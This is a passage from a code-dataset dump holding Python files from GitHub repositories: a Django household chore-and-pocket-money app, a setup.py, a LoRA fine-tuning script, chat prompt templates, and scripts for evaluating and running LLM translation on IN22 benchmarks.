id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2,286,500 | views.py | emmertex_chore_app/chore_app/views.py | import datetime
from django.contrib.auth import authenticate, get_user_model, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import UserCreationForm
from django.core.paginator import Paginator
from django.db.models import F, Q, Sum
from django.shortcuts import redirect, render
import chore_app.forms as forms
import chore_app.models as models
from chore_app.cron import nightly_action, has_run_today
UserModel = get_user_model()
class CustomUserCreationForm(UserCreationForm):
class Meta:
model = UserModel
fields = ('username', 'email', 'role', 'points_balance')
def register(request):
form = CustomUserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
else:
return render(request, 'registration/register.html', {'form': form})
def profile(request):
if request.user is not None:
if request.user.role == 'Parent':
return redirect('parent_profile')
else:
return redirect('child_profile')
else:
return redirect('login')
@login_required
def settings(request):
if request.user.role == 'Parent':
context = {
'settings': models.Settings.objects.all()
}
response = render(request, 'settings.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
else:
return redirect('child_profile')
@login_required
def edit_settings(request, pk):
try:
settings = models.Settings.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditSettingsForm(request.POST, instance=settings)
if form.is_valid():
form.save()
return redirect('settings')
else:
form = forms.EditSettingsForm(
instance=models.Settings.objects.get(pk=pk))
return render(request, 'edit_settings.html', {'form': form, 'settings': models.Settings.objects.get(pk=pk)})
except:
return redirect('parent_profile')
@login_required
def messages(request):
if request.user.role == 'Parent':
context = {
'messages': models.Text.objects.all()
}
response = render(request, 'messages.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
else:
return redirect('child_profile')
@login_required
def edit_text(request, pk):
try:
text = models.Text.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditTextForm(request.POST, instance=text)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.EditTextForm(instance=text)
return render(request, 'edit_text.html', {'form': form, 'text': models.Text.objects.get(pk=pk)})
except:
return redirect('parent_profile')
@login_required
def parent_profile(request):
if request.user.role != 'Parent':
return redirect('child_profile')
point_logs = models.PointLog.objects.all().order_by('-date_recorded')
paginator = Paginator(point_logs, 20)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
chore_points = models.PointLog.objects.filter(
date_recorded__date=datetime.date.today()
).exclude(
chore=''
).values(
'user', 'user__username'
).annotate(
total_points=Sum('points_change')
).order_by('-total_points')
daily_task_ran = not has_run_today('chore_app.cron.nightly_action')
context = {
'available_chores': models.Chore.objects.filter(available=True),
'unavailable_chores': models.Chore.objects.filter(available=False),
'claimed_chores': models.ChoreClaim.objects.filter(approved=0).select_related('chore'),
'chore_points': chore_points,
'point_logs': page_obj,
'children': models.User.objects.filter(role='Child'),
'daily_task_ran': daily_task_ran
}
response = render(request, 'parent_profile.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
@login_required
def child_profile(request):
current_time = datetime.datetime.now().time()
bonus = current_time <= datetime.time(models.Settings.objects.get(
key='bonus_end_time').value) and current_time > datetime.time(5)
point_logs = models.PointLog.objects.filter(
user=request.user).order_by('-date_recorded')
paginator = Paginator(point_logs, 10)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
chore_points = models.PointLog.objects.filter(
date_recorded__date=datetime.date.today()
).exclude(
chore=''
).values(
'user', 'user__username'
).annotate(
total_points=Sum('points_change')
).order_by('-total_points')
chores = models.Chore.objects.filter(available=True)
claimed_chores = models.ChoreClaim.objects.filter(
user=request.user).select_related('chore')
filtered_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).exclude(
(Q(availableTime__gte=0, availableTime__gt=current_time.hour) |
Q(availableTime__lt=0, availableTime__gt=-current_time.hour)) &
~Q(availableTime__exact=0)
)
future_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).filter(
(Q(availableTime__gte=0, availableTime__gt=current_time.hour))
)
missed_chores = chores.exclude(
name__in=claimed_chores.values_list('choreName', flat=True)
).filter(
(Q(availableTime__lt=0, availableTime__gt=-current_time.hour))
)
settings = {setting.key: setting.value for setting in models.Settings.objects.all()}
context = {
'minimum_points': models.Settings.objects.get(key='max_points').value / 2,
'pocket_money': request.user.pocket_money / 100,
'pocket_money_amount': models.Settings.objects.get(key='point_value').value,
'bonus': bonus,
'points': request.user.points_balance,
'chores': filtered_chores,
'chore_points': chore_points,
'point_logs': page_obj, # Use the paginated page_obj instead of the original queryset
'claimed_chores': claimed_chores,
'future_chores': future_chores,
'missed_chores': missed_chores,
'max_points': settings['max_points'],
'min_points': settings['min_points'],
'leaderboard_awards': settings['leaderboard_awards'],
'incomplete_chores_penalty': settings['incomplete_chores_penalty'],
'daily_message': models.Text.objects.get(key='daily_message')
}
response = render(request, 'child_profile.html', context)
response['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
@login_required
def create_chore(request):
if request.method == 'POST':
form = forms.ChoreForm(request.POST)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.ChoreForm()
return render(request, 'create_chore.html', {'form': form})
@login_required
def edit_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
if request.method == 'POST':
form = forms.EditChoreForm(request.POST, instance=chore)
if form.is_valid():
form.save()
return redirect('parent_profile')
else:
form = forms.EditChoreForm(instance=chore)
return render(request, 'edit_chore.html', {'form': form, 'chore': chore})
except:
return redirect('parent_profile')
@login_required
def toggle_availability(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.available = not chore.available
chore.save()
except:
pass
return redirect('parent_profile')
@login_required
def convert_points_to_money(request, pk):
try:
user = models.User.objects.get(pk=pk)
if user.points_balance > models.Settings.objects.get(key='max_points').value / 2:
user.pocket_money += 100 * \
models.Settings.objects.get(key='point_value').value
user.points_balance -= 100
user.save()
models.PointLog.objects.create(user=user, points_change=-100, penalty=0,
reason='Conversion to Pocket Money', chore='', approver=user)
except:
pass
return redirect('child_profile')
@login_required
def delete_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.delete()
except:
pass
return redirect('parent_profile')
@login_required
def penalise_chore(request, pk):
try:
chore = models.Chore.objects.get(pk=pk)
chore.available = False
chore.save()
for child in models.User.objects.filter(role='Child'):
models.ChoreClaim.objects.create(
chore=chore, user=child, choreName=chore.name, points=(-chore.points), approved=(-chore.points), comment='Penalty for incomplete chore'
)
except:
pass
return redirect('parent_profile')
@login_required
def claim_chore(request, pk):
try:
current_time = datetime.datetime.now().time()
chore = models.Chore.objects.get(pk=pk)
if chore.available:
if current_time <= datetime.time(models.Settings.objects.get(key='bonus_end_time').value) \
and current_time > datetime.time(5) \
and chore.earlyBonus:
addPoints = chore.points * \
((models.Settings.objects.get(key='bonus_percent').value + 100) / 100)
comment = 'Early Bonus of ' + \
str(chore.earlyBonus) + ' points: ' + chore.comment
else:
addPoints = chore.points
comment = chore.comment
models.ChoreClaim.objects.create(
chore=chore, user=request.user, choreName=chore.name, points=addPoints, comment=comment)
if not chore.persistent:
chore.available = False
chore.save()
except:
pass
return redirect('child_profile')
@login_required
def return_chore(request, pk):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
if choreClaim.approved == 0:
try:
chore = models.Chore.objects.get(pk=choreClaim.chore.pk)
chore.available = True
chore.save()
except:
pass
choreClaim.delete()
except:
pass
return redirect('child_profile')
@login_required
def approve_chore_claim(request, pk, penalty, auto=False):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
models.PointLog.objects.create(user=choreClaim.user, points_change=(choreClaim.points - (choreClaim.points * (
penalty / 100))), penalty=penalty, reason='Approved', chore=choreClaim.choreName, approver=request.user)
user = models.User.objects.get(pk=choreClaim.user.pk)
user.points_balance += (choreClaim.points -
(choreClaim.points * (penalty / 100)))
user.save()
choreClaim.approved = (choreClaim.points -
(choreClaim.points * (penalty / 100)))
choreClaim.save()
except:
pass
if not auto:
return redirect('parent_profile')
else:
return
@login_required
def reject_chore_claim(request, pk):
try:
choreClaim = models.ChoreClaim.objects.get(pk=pk)
try:
chore = models.Chore.objects.get(pk=choreClaim.chore.pk)
chore.available = True
chore.save()
except:
pass
models.PointLog.objects.create(user=choreClaim.user, points_change=0, penalty=100,
reason='Rejected', chore=choreClaim.choreName, approver=request.user)
choreClaim.delete()
except:
pass
return redirect('parent_profile')
@login_required
def point_adjustment(request, pk):
if request.method == 'POST':
form = forms.PointAdjustmentForm(request.POST)
if form.is_valid():
user = models.User.objects.get(pk=pk)
point_log = form.save(commit=False)
point_log.user = user
point_log.approver = request.user
point_log.save()
user.points_balance += form.cleaned_data['points_change']
user.save()
return redirect('parent_profile')
else:
form = forms.PointAdjustmentForm()
return render(request, 'point_adjustment.html', {'form': form})
@login_required
def pocket_money_adjustment(request, pk):
if request.method == 'POST':
form = forms.PocketMoneyAdjustmentForm(request.POST)
if form.is_valid():
user = models.User.objects.get(pk=pk)
user.pocket_money += form.cleaned_data['pocket_money']
user.save()
return redirect('parent_profile')
else:
form = forms.PocketMoneyAdjustmentForm()
return render(request, 'pocket_money_adjustment.html', {'form': form})
@login_required
def child_chore(request):
if request.method == 'POST':
form = forms.CustomChildChore(request.POST)
if form.is_valid():
chore_claim = form.save(commit=False)
chore_claim.user = request.user
chore_claim.save()
return redirect('child_profile')
else:
form = forms.CustomChildChore()
return render(request, 'child_chore.html', {'form': form})
@login_required
def daily_action(request):
nightly_action(approver=request.user)
return redirect('parent_profile')
| 14,122 | Python | .py | 358 | 31.148045 | 151 | 0.635753 | emmertex/chore_app | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,501 | extra_filters.py | emmertex_chore_app/chore_app/templatetags/extra_filters.py | from django import template
register = template.Library()
@register.filter(name='halve')
def halve(value):
try:
return str(int(value / 2))
except (ValueError, TypeError):
return str(int(value))
@register.filter(name='fifth')
def fifth(value):
try:
return str(int(value / 5))
except (ValueError, TypeError):
return str(int(value))
@register.filter(name='abs_filter')
def abs_filter(value):
try:
return str(int(abs(value)))
except (ValueError, TypeError):
return str(int(value))
| 554 | Python | .py | 20 | 22.85 | 35 | 0.669187 | emmertex/chore_app | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,502 | setup.py | adithya-s-k_Indic-llm/setup.py | import os
from setuptools import find_packages, setup
_PATH_ROOT = os.path.dirname(__file__)
with open(os.path.join(_PATH_ROOT, "README.md"), encoding="utf-8") as fo:
readme = fo.read()
setup(
name="indic_llm",
version="0.1.0",
description="Open source large language model implementation",
author="Adithya S Kolavi",
url="https://github.com/adithya-s-k/Indic-llm",
install_requires=[
"torch>=2.2.0",
],
packages=find_packages(),
long_description=readme,
long_description_content_type="text/markdown",
) | 559 | Python | .py | 18 | 27 | 73 | 0.684015 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,503 | sft.py | adithya-s-k_Indic-llm/archives/finetuning/sft.py | # Fine-Tune Llama2-7b on SE paired dataset
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from accelerate import Accelerator
from datasets import load_dataset
from peft import AutoPeftModelForCausalLM, LoraConfig
from tqdm import tqdm
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig, HfArgumentParser, TrainingArguments
from trl import SFTTrainer
from trl.import_utils import is_npu_available, is_xpu_available
from trl.trainer import ConstantLengthDataset
@dataclass
class ScriptArguments:
model_name: Optional[str] = field(default="meta-llama/Llama-2-7b-hf", metadata={"help": "the model name"})
dataset_name: Optional[str] = field(default="lvwerra/stack-exchange-paired", metadata={"help": "the dataset name"})
subset: Optional[str] = field(default="data/finetune", metadata={"help": "the subset to use"})
split: Optional[str] = field(default="train", metadata={"help": "the split to use"})
size_valid_set: Optional[int] = field(default=4000, metadata={"help": "the size of the validation set"})
streaming: Optional[bool] = field(default=True, metadata={"help": "whether to stream the dataset"})
shuffle_buffer: Optional[int] = field(default=5000, metadata={"help": "the shuffle buffer size"})
seq_length: Optional[int] = field(default=1024, metadata={"help": "the sequence length"})
num_workers: Optional[int] = field(default=4, metadata={"help": "the number of workers"})
packing: Optional[bool] = field(default=True, metadata={"help": "whether to use packing for SFTTrainer"})
# LoraConfig
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
parser = HfArgumentParser((ScriptArguments, TrainingArguments))
script_args, training_args = parser.parse_args_into_dataclasses()
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=["q_proj", "v_proj"],
bias="none",
task_type="CAUSAL_LM",
)
if training_args.group_by_length and script_args.packing:
raise ValueError("Cannot use both packing and group by length")
# `gradient_checkpointing` was True by default until `1f3314`, but it's actually not used.
# `gradient_checkpointing=True` will cause `Variable._execution_engine.run_backward`.
if training_args.gradient_checkpointing:
raise ValueError("gradient_checkpointing not supported")
def chars_token_ratio(dataset, tokenizer, nb_examples=400):
"""
Estimate the average number of characters per token in the dataset.
"""
total_characters, total_tokens = 0, 0
for _, example in tqdm(zip(range(nb_examples), iter(dataset)), total=nb_examples):
text = prepare_sample_text(example)
total_characters += len(text)
if tokenizer.is_fast:
total_tokens += len(tokenizer(text).tokens())
else:
total_tokens += len(tokenizer.tokenize(text))
return total_characters / total_tokens
def print_trainable_parameters(model):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_param = 0
for _, param in model.named_parameters():
all_param += param.numel()
if param.requires_grad:
trainable_params += param.numel()
print(
f"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}"
)
def prepare_sample_text(example):
"""Prepare the text from a sample of the dataset."""
text = f"Question: {example['question']}\n\nAnswer: {example['response_j']}"
return text
def create_datasets(tokenizer, args):
dataset = load_dataset(
args.dataset_name,
data_dir=args.subset,
split=args.split,
use_auth_token=True,
num_proc=args.num_workers if not args.streaming else None,
streaming=args.streaming,
)
if args.streaming:
print("Loading the dataset in streaming mode")
valid_data = dataset.take(args.size_valid_set)
train_data = dataset.skip(args.size_valid_set)
train_data = train_data.shuffle(buffer_size=args.shuffle_buffer, seed=None)
else:
dataset = dataset.train_test_split(test_size=0.005, seed=None)
train_data = dataset["train"]
valid_data = dataset["test"]
print(f"Size of the train set: {len(train_data)}. Size of the validation set: {len(valid_data)}")
chars_per_token = chars_token_ratio(train_data, tokenizer)
print(f"The character to token ratio of the dataset is: {chars_per_token:.2f}")
train_dataset = ConstantLengthDataset(
tokenizer,
train_data,
formatting_func=prepare_sample_text,
infinite=True,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
valid_dataset = ConstantLengthDataset(
tokenizer,
valid_data,
formatting_func=prepare_sample_text,
infinite=False,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
return train_dataset, valid_dataset
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
base_model = AutoModelForCausalLM.from_pretrained(
script_args.model_name,
quantization_config=bnb_config,
device_map={"": Accelerator().local_process_index},
trust_remote_code=True,
use_auth_token=True,
)
base_model.config.use_cache = False
tokenizer = AutoTokenizer.from_pretrained(script_args.model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right" # Fix weird overflow issue with fp16 training
train_dataset, eval_dataset = create_datasets(tokenizer, script_args)
trainer = SFTTrainer(
model=base_model,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
peft_config=peft_config,
packing=script_args.packing,
max_seq_length=None,
tokenizer=tokenizer,
args=training_args,
)
trainer.train()
trainer.save_model(training_args.output_dir)
output_dir = os.path.join(training_args.output_dir, "final_checkpoint")
trainer.model.save_pretrained(output_dir)
# Free memory for merging weights
del base_model
if is_xpu_available():
torch.xpu.empty_cache()
elif is_npu_available():
torch.npu.empty_cache()
else:
torch.cuda.empty_cache()
model = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map="auto", torch_dtype=torch.bfloat16)
model = model.merge_and_unload()
output_merged_dir = os.path.join(training_args.output_dir, "final_merged_checkpoint")
model.save_pretrained(output_merged_dir, safe_serialization=True) | 6,958 | Python | .py | 156 | 39.717949 | 126 | 0.720762 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,504 | template.py | adithya-s-k_Indic-llm/archives/eval/template.py | def create_prompt_with_tulu_chat_format(messages, bos="<s>", eos="</s>", add_bos=True):
formatted_text = ""
for message in messages:
if message["role"] == "system":
formatted_text += "<|system|>\n" + message["content"] + "\n"
elif message["role"] == "user":
formatted_text += "<|user|>\n" + message["content"] + "\n"
elif message["role"] == "assistant":
formatted_text += "<|assistant|>\n" + message["content"].strip() + eos + "\n"
else:
raise ValueError(
"Tulu chat template only supports 'system', 'user' and 'assistant' roles. Invalid role: {}.".format(
message["role"]
)
)
formatted_text += "<|assistant|>\n"
formatted_text = bos + formatted_text if add_bos else formatted_text
return formatted_text
def create_prompt_with_llama2_chat_format(messages, bos="<s>", eos="</s>", add_bos=True):
"""
This function is adapted from the official llama2 chat completion script:
https://github.com/facebookresearch/llama/blob/7565eb6fee2175b2d4fe2cfb45067a61b35d7f5e/llama/generation.py#L274
"""
B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n"
B_INST, E_INST = "[INST]", "[/INST]"
formatted_text = ""
# If you want to include system prompt, see this discussion for the template: https://huggingface.co/TheBloke/Llama-2-7B-Chat-GGML/discussions/4
# However, see here that removing the system prompt actually reduce the false refusal rates: https://github.com/facebookresearch/llama/blob/main/UPDATES.md?utm_source=twitter&utm_medium=organic_social&utm_campaign=llama2&utm_content=text#observed-issue
if messages[0]["role"] == "system":
assert (
len(messages) >= 2 and messages[1]["role"] == "user"
), "LLaMa2 chat cannot start with a single system message."
messages = [
{
"role": "user",
"content": B_SYS + messages[0]["content"] + E_SYS + messages[1]["content"],
}
] + messages[2:]
for message in messages:
if message["role"] == "user":
formatted_text += bos + f"{B_INST} {(message['content']).strip()} {E_INST}"
elif message["role"] == "assistant":
formatted_text += f" {(message['content'])} " + eos
else:
raise ValueError(
"Llama2 chat template only supports 'system', 'user' and 'assistant' roles. Invalid role: {}.".format(
message["role"]
)
)
# The llama2 chat template by default has a bos token at the start of each user message.
# The next line removes the bos token if add_bos is False.
formatted_text = formatted_text[len(bos) :] if not add_bos else formatted_text
return formatted_text | 2,838 | Python | .py | 53 | 44.075472 | 256 | 0.600575 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,505 | eval.py | adithya-s-k_Indic-llm/archives/eval/eval.py | import argparse
import os
import random
import torch
import numpy as np
import pandas as pd
import time
import json
from tqdm import tqdm
import time
import evaluate
from datasets import load_dataset
from eval.utils import (
generate_completions,
load_hf_lm_and_tokenizer,
dynamic_import_function,
)
from bleurt import score
lang_map = {
"asm_Beng": "Assamese",
"ben_Beng": "Bengali",
"brx_Deva": "Bodo",
"doi_Deva": "Dogri",
"eng_Latn": "English",
"guj_Gujr": "Gujarati",
"gom_Deva": "Konkani",
"hin_Deva": "Hindi",
"kan_Knda": "Kannada",
"kas_Arab": "Kashmiri",
"mai_Deva": "Maithili",
"mal_Mlym": "Malayalam",
"mar_Deva": "Marathi",
"mni_Mtei": "Manipuri",
"npi_Deva": "Nepali",
"ory_Orya": "Odia",
"pan_Guru": "Punjabi",
"san_Deva": "Sanskrit",
"sat_Olck": "Santali",
"snd_Deva": "Sindhi",
"tam_Taml": "Tamil",
"tel_Telu": "Telugu",
"urd_Arab": "Urdu",
}
def format_example(src_text, src_lang, tgt_lang, tgt_text=None):
prompt = f"{lang_map[src_lang]}: {src_text}"
prompt += f"\n{lang_map[tgt_lang]}:"
if tgt_text is not None:
prompt += f" {tgt_text}\n\n"
return prompt
def gen_prompt(dev_data, src_lang, tgt_lang, k=-1):
prompt = f"Translate the following sentence(s) from {lang_map[src_lang]} into {lang_map[tgt_lang]}.\n\n"
if k > 0:
exemplars = dev_data.select(range(k))
for example in exemplars:
prompt += format_example(
src_text=example[f"sentence_{src_lang}"],
src_lang=src_lang,
tgt_lang=tgt_lang,
tgt_text=example[f"sentence_{tgt_lang}"],
)
return prompt
def main(args):
random.seed(args.seed)
if args.model_name_or_path:
print("Loading model and tokenizer...")
model, tokenizer = load_hf_lm_and_tokenizer(
model_name_or_path=args.model_name_or_path,
tokenizer_name_or_path=args.tokenizer_name_or_path,
load_in_8bit=args.load_in_8bit,
device_map="balanced_low_0" if torch.cuda.device_count() > 1 else "auto",
gptq_model=args.gptq,
)
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
chat_formatting_function = dynamic_import_function(args.chat_formatting_function) if args.use_chat_format else None
dataset = load_dataset(args.dataset, f"{args.src_lang}-{args.tgt_lang}")
dataset = dataset.map(
lambda x: {
f"sentence_{args.src_lang}": x[f"sentence_{args.src_lang}"].strip(),
f"sentence_{args.tgt_lang}": x[f"sentence_{args.tgt_lang}"].strip(),
}
)
test_data = dataset["gen"] if args.dataset == "ai4bharat/IN22-Gen" else dataset["conv"]
# test_data = test_data.select(range(50))
prompts = []
for i, example in enumerate(test_data):
dev_data = test_data.filter(
lambda x: x[f"sentence_{args.src_lang}"] != example[f"sentence_{args.src_lang}"]
).shuffle(args.seed)
k = args.ntrain
prompt_end = format_example(
src_text=example[f"sentence_{args.src_lang}"], src_lang=args.src_lang, tgt_lang=args.tgt_lang
)
train_prompt = gen_prompt(dev_data, args.src_lang, args.tgt_lang, k)
prompt = train_prompt + prompt_end
if args.use_chat_format:
messages = [{"role": "user", "content": prompt}]
prompt = chat_formatting_function(messages, add_bos=False)
if prompt[-1] in ["\n", " "]:
prompt += f"The {lang_map[args.tgt_lang]} translation is: "
else:
prompt += f" The {lang_map[args.tgt_lang]} translation is: "
tokenized_prompt = tokenizer(prompt, truncation=False, add_special_tokens=False).input_ids
# make sure every prompt is less than 2048 tokens
while len(tokenized_prompt) > 2048:
k -= 1
train_prompt = gen_prompt(dev_data, k)
prompt = train_prompt + prompt_end
if args.use_chat_format:
messages = [{"role": "user", "content": prompt}]
prompt = chat_formatting_function(messages, add_bos=False)
if prompt[-1] in ["\n", " "]:
prompt += f"The {lang_map[args.tgt_lang]} translation is: "
else:
prompt += f" The {lang_map[args.tgt_lang]} translation is: "
tokenized_prompt = tokenizer(prompt, truncation=False, add_special_tokens=False).input_ids
prompts.append(prompt)
outputs = generate_completions(
model=model,
tokenizer=tokenizer,
prompts=prompts,
max_new_tokens=256,
batch_size=args.eval_batch_size,
stop_id_sequences=None,
)
# remove unnecessary space
outputs = [output.strip().split("\n")[0] for output in outputs]
with open(os.path.join(args.save_dir, f"in22_{args.src_lang}_{args.tgt_lang}_predictions.jsonl"), "w") as fout:
for example, output in zip(test_data, outputs):
example["prediction_text"] = output
fout.write(json.dumps(example) + "\n")
# flush all the GPU memory
del model
torch.cuda.empty_cache()
import gc
gc.collect()
print("Calculating bleu, chrf, chrf++, bleurt ...")
sacrebleu = evaluate.load("sacrebleu")
chrf = evaluate.load("chrf")
bleurt = score.BleurtScorer(args.bleurt_model_name_or_path)
predictions = [output for output in outputs]
references = [[example[f"sentence_{args.tgt_lang}"]] for example in test_data]
metrics = {
"bleu": sacrebleu.compute(predictions=predictions, references=references)["score"],
"chrf": chrf.compute(predictions=predictions, references=references)["score"],
"chrf2": chrf.compute(predictions=predictions, references=references, word_order=2)["score"],
"bleurt": np.mean(
bleurt.score(candidates=predictions, references=[ref for sublist in references for ref in sublist])
),
}
for k, v in metrics.items():
print(f"{k}: {v:.4f}")
# save results
with open(os.path.join(args.save_dir, "metrics.json"), "w") as fout:
json.dump(metrics, fout, indent=4)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ntrain", type=int, default=5, help="number of examples to use for few-shot evaluation.")
parser.add_argument("--seed", type=int, default=42)
parser.add_argument(
"--dataset", type=str, default="ai4bharat/IN22-Gen", choices=["ai4bharat/IN22-Gen", "ai4bharat/IN22-Conv"]
)
parser.add_argument(
"--src_lang",
type=str,
default="eng_Latn",
choices=list(lang_map.keys()),
)
parser.add_argument(
"--tgt_lang",
type=str,
default="hin_Deva",
choices=list(lang_map.keys()),
)
parser.add_argument("--save_dir", type=str, default="results/in22-gen/llama-7B/")
parser.add_argument(
"--bleurt_model_name_or_path",
type=str,
default="/data/jaygala/bleurt/BLEURT-20",
help="bleurt model to load for evaluation.",
)
parser.add_argument(
"--model_name_or_path",
type=str,
default=None,
help="if specified, we will load the model to generate the predictions.",
)
parser.add_argument(
"--tokenizer_name_or_path",
type=str,
default=None,
help="if specified, we will load the tokenizer from here.",
)
parser.add_argument("--eval_batch_size", type=int, default=1, help="batch size for evaluation.")
parser.add_argument(
"--load_in_8bit",
action="store_true",
help="load model in 8bit mode, which will reduce memory and speed up inference.",
)
parser.add_argument(
"--gptq",
action="store_true",
help="If given, we're evaluating a 4-bit quantized GPTQ model.",
)
parser.add_argument(
"--use_chat_format",
action="store_true",
help="If given, we will use the chat format for the prompts.",
)
parser.add_argument(
"--chat_formatting_function",
type=str,
default="eval.templates.create_prompt_with_tulu_chat_format",
help="The function to use to create the chat format. This function will be dynamically imported. Please see examples in `eval/templates.py`.",
)
args = parser.parse_args()
main(args) | 8,510 | Python | .py | 217 | 31.668203 | 150 | 0.615989 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,506 | predict.py | adithya-s-k_Indic-llm/archives/eval/predict.py | """
This script is used to get models' predictions on a set of prompts (put in files with *.jsonl format,
with the prompt in a `prompt` field or the conversation history in a `messages` field).
For example, to get predictions on a set of prompts, you should put them in a file with the following format:
{"id": <uniq_id>, "prompt": "Plan a trip to Paris."}
...
Or you can use the messages format:
{"id": <uniq_id>, "messages": [{"role": "user", "content": "Plan a trip to Paris."}]}
...
Then you can run this script with the following command:
python eval/predict.py \
--model_name_or_path <huggingface_model_name_or_path> \
--input_files <input_file_1> <input_file_2> ... \
--output_file <output_file> \
--batch_size <batch_size> \
--use_vllm
"""
import argparse
import json
import os
import vllm
import torch
from eval.utils import (
generate_completions,
load_hf_lm_and_tokenizer,
query_openai_chat_model,
dynamic_import_function,
)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", type=str, help="Huggingface model name or path.")
parser.add_argument(
"--tokenizer_name_or_path", type=str, help="Huggingface tokenizer name or path."
)
parser.add_argument(
"--use_slow_tokenizer",
action="store_true",
help="If given, we will use the slow tokenizer.",
)
parser.add_argument(
"--openai_engine",
type=str,
help="OpenAI engine name. This should be exclusive with `model_name_or_path`.",
)
parser.add_argument(
"--input_files",
type=str,
nargs="+",
help="Input .jsonl files, with each line containing `id` and `prompt` or `messages`.",
)
parser.add_argument(
"--output_file",
type=str,
default="output/model_outputs.jsonl",
help="Output .jsonl file, with each line containing `id`, `prompt` or `messages`, and `output`.",
)
parser.add_argument("--batch_size", type=int, default=1, help="batch size for prediction.")
parser.add_argument(
"--load_in_8bit",
action="store_true",
help="load model in 8bit mode, which will reduce memory and speed up inference.",
)
parser.add_argument(
"--load_in_float16",
action="store_true",
help="By default, huggingface model will be loaded in the torch.dtype specificed in its model_config file."
"If specified, the model dtype will be converted to float16 using `model.half()`.",
)
parser.add_argument(
"--gptq",
action="store_true",
help="If given, we're evaluating a 4-bit quantized GPTQ model.",
)
parser.add_argument(
"--use_vllm",
action="store_true",
help="If given, we will use the vllm library, which will likely increase the inference throughput.",
)
parser.add_argument(
"--use_chat_format",
action="store_true",
help="If given, we will use the chat format for the prompts.",
)
parser.add_argument(
"--chat_formatting_function",
type=str,
default="eval.templates.create_prompt_with_tulu_chat_format",
help="The function to use to create the chat format. This function will be dynamically imported. Please see examples in `eval/templates.py`.",
)
parser.add_argument(
"--max_new_tokens", type=int, default=2048, help="maximum number of new tokens to generate."
)
parser.add_argument(
"--do_sample",
action="store_true",
help="whether to use sampling ; use greedy decoding otherwise.",
)
parser.add_argument("--temperature", type=float, default=1.0, help="temperature for sampling.")
parser.add_argument("--top_p", type=float, default=1.0, help="top_p for sampling.")
args = parser.parse_args()
# model_name_or_path and openai_engine should be exclusive.
assert (args.model_name_or_path is None) != (
args.openai_engine is None
), "model_name_or_path and openai_engine should be exclusive."
return args
if __name__ == "__main__":
args = parse_args()
# check if output directory exists
if args.output_file is not None:
output_dir = os.path.dirname(args.output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# load the data
for input_file in args.input_files:
with open(input_file, "r") as f:
instances = [json.loads(x) for x in f.readlines()]
if args.model_name_or_path is not None:
prompts = []
chat_formatting_function = (
dynamic_import_function(args.chat_formatting_function) if args.use_chat_format else None
)
for instance in instances:
if "messages" in instance:
if not args.use_chat_format:
raise ValueError(
"If `messages` is in the instance, `use_chat_format` should be True."
)
